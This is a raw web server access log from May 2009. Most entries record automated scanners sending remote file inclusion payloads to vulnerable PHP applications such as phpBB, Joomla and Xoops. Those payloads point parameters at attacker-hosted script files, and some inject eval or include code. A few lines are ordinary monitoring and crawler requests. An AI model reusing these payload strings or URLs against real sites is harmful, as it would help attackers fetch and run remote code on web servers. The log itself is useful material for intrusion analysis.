61.160.201.12 - - [13/May/2009:05:27:31 -0400] "GET /logs/errors.php?error=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.160.201.12 - - [13/May/2009:05:27:31 -0400] "GET /errors.php?error=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
212.227.63.136 - - [13/May/2009:05:27:37 -0400] "GET /logs/access_log.Q108122500//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
216.176.196.171 - - [13/May/2009:05:28:06 -0400] "GET /logs/access_log.Q109041200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
212.227.63.136 - - [13/May/2009:05:28:19 -0400] "GET /logs/access_log.Q108120400//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
216.176.196.171 - - [13/May/2009:05:28:24 -0400] "GET /logs/access_log.Q108120100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
84.32.195.2 - - [13/May/2009:05:29:51 -0400] "GET /logs/access_log.Q109022600//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [13/May/2009:05:31:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.176.196.171 - - [13/May/2009:05:33:01 -0400] "GET /?sourcedir=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
216.176.196.171 - - [13/May/2009:05:33:01 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
216.176.196.171 - - [13/May/2009:05:33:01 -0400] "GET /logs/?sourcedir=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 200 1150 "-" "libwww-perl/5.79"
216.176.196.171 - - [13/May/2009:05:33:01 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
121.101.159.29 - - [13/May/2009:05:33:14 -0400] "GET /logs/access_log.Q108083100//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
121.101.159.29 - - [13/May/2009:05:33:16 -0400] "GET /logs/access_log.Q108083100//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
72.30.79.49 - - [13/May/2009:05:33:28 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.49 - - [13/May/2009:05:33:28 -0400] "GET /logs/error_log.Q107072300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
194.181.2.29 - - [13/May/2009:05:34:07 -0400] "GET /logs/access_log.Q108100100///appserv/main.php?appserv_root=http://www.hetjongeschaap.nl/site/images/response.txt????? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
194.181.2.29 - - [13/May/2009:05:34:07 -0400] "GET /logs///appserv/main.php?appserv_root=http://www.hetjongeschaap.nl/site/images/response.txt????? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
194.181.2.29 - - [13/May/2009:05:34:07 -0400] "GET ///appserv/main.php?appserv_root=http://www.hetjongeschaap.nl/site/images/response.txt????? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
194.181.2.29 - - [13/May/2009:05:34:10 -0400] "GET /logs/access_log.Q108111600///appserv/main.php?appserv_root=http://www.hetjongeschaap.nl/site/images/response.txt????? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
194.181.2.29 - - [13/May/2009:05:34:14 -0400] "GET /logs/access_log.Q108100100///appserv/main.php?appserv_root=http://www.hetjongeschaap.nl/site/images/response.txt????? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
194.181.2.29 - - [13/May/2009:05:34:14 -0400] "GET ///appserv/main.php?appserv_root=http://www.hetjongeschaap.nl/site/images/response.txt????? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
194.181.2.29 - - [13/May/2009:05:34:14 -0400] "GET /logs///appserv/main.php?appserv_root=http://www.hetjongeschaap.nl/site/images/response.txt????? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
194.181.2.29 - - [13/May/2009:05:34:16 -0400] "GET /logs/access_log.Q108111600///appserv/main.php?appserv_root=http://www.hetjongeschaap.nl/site/images/response.txt????? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
211.144.136.88 - - [13/May/2009:05:34:30 -0400] "GET /logs/access_log.Q108121900%20%20//viewbody.html?code=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.144.136.88 - - [13/May/2009:05:34:33 -0400] "GET /logs/access_log.Q109041100%20%20//viewbody.html?code=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
124.0.55.34 - - [13/May/2009:05:35:35 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
124.0.55.34 - - [13/May/2009:05:35:35 -0400] "GET /logs/access_log.Q108122800/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
124.0.55.34 - - [13/May/2009:05:35:35 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
124.0.55.34 - - [13/May/2009:05:35:35 -0400] "GET /logs/access_log.Q108100600/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
84.32.195.2 - - [13/May/2009:05:36:08 -0400] "GET /logs/access_log.Q108090900%20%20//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [13/May/2009:05:36:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.79.49 - - [13/May/2009:05:37:28 -0400] "GET /logs/access_log.Q108072100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.117.191.71 - - [13/May/2009:05:39:16 -0400] "GET /logs/access_log.Q108081700//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.65"
216.117.191.71 - - [13/May/2009:05:39:16 -0400] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
216.117.191.71 - - [13/May/2009:05:39:16 -0400] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.65"
121.101.159.29 - - [13/May/2009:05:39:34 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
121.101.159.29 - - [13/May/2009:05:39:34 -0400] "GET /logs/access_log.Q108121900/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
121.101.159.29 - - [13/May/2009:05:39:34 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
121.101.159.29 - - [13/May/2009:05:39:34 -0400] "GET /logs/access_log.Q108082400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
216.117.191.71 - - [13/May/2009:05:39:43 -0400] "GET /logs/access_log.Q108061500//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.65"
124.0.55.34 - - [13/May/2009:05:40:09 -0400] "GET /logs/access_log.Q108100600%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
124.0.55.34 - - [13/May/2009:05:40:09 -0400] "GET /logs/access_log.Q108122800%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
87.106.135.14 - - [13/May/2009:05:40:11 -0400] "GET /logs/access_log.Q108081700//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:05:40:12 -0400] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:05:40:14 -0400] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:05:41:05 -0400] "GET /logs/access_log.Q108061500//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:05:41:21 -0400] "GET /logs/access_log.Q108081800/joomla/index.php?option=com_restaurante&task=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:05:41:22 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:05:41:22 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
67.204.0.222 - - [13/May/2009:05:41:23 -0400] "GET /logs/access_log.Q108081800/joomla/index.php?option=com_restaurante&task=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:05:41:23 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:05:41:25 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:05:41:36 -0400] "GET /logs/access_log.Q108062000/joomla/index.php?option=com_restaurante&task=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
77.221.130.19 - - [13/May/2009:05:41:36 -0400] "GET /logs/access_log.Q108062000/joomla/index.php?option=com_restaurante&task=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
209.59.12.99 - - [13/May/2009:05:41:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.101.159.29 - - [13/May/2009:05:41:57 -0400] "GET /logs/access_log.Q108091000/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
200.32.100.130 - - [13/May/2009:05:42:30 -0400] "GET /logs/environment.php?DIR_PREFIX=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:42:33 -0400] "GET /logs/access_log.Q109020500/environment.php?DIR_PREFIX=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:42:36 -0400] "GET /logs/environment.php?DIR_PREFIX=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:42:36 -0400] "GET /logs/config.php?path_to_root=http://winemagazine.ro/pics/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:42:36 -0400] "GET /logs/access_log.Q109020500/config.php?path_to_root=http://winemagazine.ro/pics/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:42:37 -0400] "GET /config.php?path_to_root=http://winemagazine.ro/pics/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:42:39 -0400] "GET /environment.php?DIR_PREFIX=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:42:39 -0400] "GET /logs/access_log.Q109020500%20%20/environment.php?DIR_PREFIX=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:42:40 -0400] "GET /logs/config.php?path_to_root=http://winemagazine.ro/pics/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:42:59 -0400] "GET /environment.php?DIR_PREFIX=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.101.159.29 - - [13/May/2009:05:42:59 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
200.32.100.130 - - [13/May/2009:05:42:59 -0400] "GET /logs/environment.php?DIR_PREFIX=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:42:59 -0400] "GET /logs/access_log.Q109020500%20%20/environment.php?DIR_PREFIX=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
121.101.159.29 - - [13/May/2009:05:42:59 -0400] "GET /logs/access_log.Q108082400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
121.101.159.29 - - [13/May/2009:05:42:59 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
121.101.159.29 - - [13/May/2009:05:43:13 -0400] "GET /logs/access_log.Q108121900/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
69.94.56.98 - - [13/May/2009:05:43:28 -0400] "GET /logs/access_log.Q108081800/joomla/index.php?option=com_restaurante&task=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 241 "-" "libwww-perl/5.48"
69.94.56.98 - - [13/May/2009:05:43:28 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 214 "-" "libwww-perl/5.48"
69.94.56.98 - - [13/May/2009:05:43:28 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 219 "-" "libwww-perl/5.48"
200.32.100.130 - - [13/May/2009:05:43:40 -0400] "GET /config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:43:40 -0400] "GET /logs/access_log.Q108072300/config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:43:42 -0400] "GET /logs/access_log.Q109020500/config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:43:42 -0400] "GET /logs/config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.30.79.49 - - [13/May/2009:05:43:49 -0400] "GET /logs/access_log.Q108032000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.32.100.130 - - [13/May/2009:05:43:49 -0400] "GET /logs/access_log.Q109020500/config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:43:49 -0400] "GET /logs/access_log.Q108072300/config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:43:50 -0400] "GET /logs/config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:43:50 -0400] "GET /logs/access_log.Q109020500/config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:43:53 -0400] "GET /config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:43:53 -0400] "GET /logs/access_log.Q108072300/config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:43:59 -0400] "GET /config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:43:59 -0400] "GET /logs/access_log.Q108072300/config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:43:59 -0400] "GET /logs/config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:44:01 -0400] "GET /logs/access_log.Q109020500/config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:44:06 -0400] "GET /config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:44:06 -0400] "GET /logs/config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:44:06 -0400] "GET /logs/access_log.Q109020500/config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:44:06 -0400] "GET /logs/access_log.Q108072300/config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:44:08 -0400] "GET /logs/access_log.Q108072300/config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.165.73.157 - - [13/May/2009:05:44:10 -0400] "GET /logs/access_log.Q109022600//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:05:44:10 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:05:44:10 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:05:44:10 -0400] "GET /logs/access_log.Q108112900//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
200.32.100.130 - - [13/May/2009:05:44:11 -0400] "GET /logs/access_log.Q109020500/config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:44:11 -0400] "GET /config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:44:11 -0400] "GET /config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:44:11 -0400] "GET /logs/config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:44:14 -0400] "GET /logs/access_log.Q109020500/config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:44:14 -0400] "GET /logs/access_log.Q108072300/config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:44:17 -0400] "GET /logs/access_log.Q108072300/config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.228.155.80 - - [13/May/2009:05:44:18 -0400] "GET /logs/access_log.Q109022200//modules/xfsection/modify.php?dir_module=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
195.228.155.80 - - [13/May/2009:05:44:18 -0400] "GET //modules/xfsection/modify.php?dir_module=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
195.228.155.80 - - [13/May/2009:05:44:18 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
200.32.100.130 - - [13/May/2009:05:44:20 -0400] "GET /config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:44:20 -0400] "GET /logs/access_log.Q109020500/config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:44:20 -0400] "GET /logs/config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:44:26 -0400] "GET /config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:05:44:26 -0400] "GET /logs/access_log.Q108072300/config.php?path_to_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.94.56.98 - - [13/May/2009:05:44:29 -0400] "GET /logs/access_log.Q108062000/joomla/index.php?option=com_restaurante&task=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 241 "-" "libwww-perl/5.48"
193.221.119.126 - - [13/May/2009:05:44:35 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
193.221.119.126 - - [13/May/2009:05:44:35 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
193.221.119.126 - - [13/May/2009:05:44:35 -0400] "GET /logs/access_log.Q109032800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.101.159.29 - - [13/May/2009:05:44:58 -0400] "GET /logs/access_log.Q108082700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
121.101.159.29 - - [13/May/2009:05:44:58 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
121.101.159.29 - - [13/May/2009:05:44:58 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
69.94.56.98 - - [13/May/2009:05:45:06 -0400] "GET /environment.php?DIR_PREFIX=http://www.depo.org.pk/images/21/ts?? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
69.94.56.98 - - [13/May/2009:05:45:06 -0400] "GET /logs/environment.php?DIR_PREFIX=http://www.depo.org.pk/images/21/ts?? HTTP/1.0" 404 218 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
121.101.159.29 - - [13/May/2009:05:45:07 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
